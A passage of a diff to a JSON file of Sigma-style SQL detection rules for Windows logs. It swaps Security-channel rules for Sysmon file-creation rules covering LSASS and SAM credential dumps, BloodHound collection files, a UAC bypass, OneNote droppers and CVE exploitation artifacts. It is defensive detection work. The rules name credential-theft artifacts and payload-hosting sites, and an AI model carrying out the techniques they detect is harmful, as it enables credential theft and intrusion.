TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND 